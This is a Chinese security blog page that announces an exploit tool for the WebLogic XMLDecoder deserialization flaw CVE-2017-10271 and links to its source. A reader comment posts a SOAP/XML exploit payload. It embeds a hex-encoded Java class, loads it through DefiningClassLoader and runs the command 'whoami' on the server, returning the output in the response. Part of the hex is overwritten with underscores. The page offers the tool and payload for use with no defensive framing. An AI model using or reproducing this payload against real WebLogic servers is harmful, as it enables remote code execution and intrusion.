我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>博主出品>> 工具Java反序列化漏洞利用工具[CVE-2017-10271 Weblogic XMLDecoder反序列化漏洞利用]
Java反序列化漏洞利用工具[CVE-2017-10271 Weblogic XMLDecoder反序列化漏洞利用]
2167
0推荐
2评论


目前只有:


CVE-2017-10271 Weblogic XMLDecoder反序列化漏洞利用


运行环境Java 1.8


开发工具:NetBeans 8.2


1525020852124_049567.jpg


源码及编译下载地址:https://github.com/shack2/javaserializetools/releases/


已经有 ( 2 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
  • 2楼 weishane 发表于:2018-03-08 14:34:07.0        回复
    <?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="weblogic.utils.Hex" method="fromHexString" id="cls"><string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string> </void> <void class="org.mozilla.classfile.DefiningClassLoader"> <void method="defineClass"> <string>com.supeream.exploits.XmlExp</string> <object idref="cls"></object> <void method="newInstance"> <void method="say" id="proc"> <string>whoami</string> </void> </void> </void> </void> <void class="java.lang.Thread" method="currentThread"> <void method="getCurrentWork"> <void method="getResponse"> <void method="getServletOutputStream"> <void method="writeStream"> <object idref="proc"></object> </void> <void method="flush"/> </void> <void method="getWriter"><void method="write"><string></string></void></void> </void> </void> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
  • 1楼 空空老师 发表于:2018-06-01 12:39:07.0        回复
    博主这个工具下载地址失效了,可否更新一下
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
  • 最新评论
  •  
  •  
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415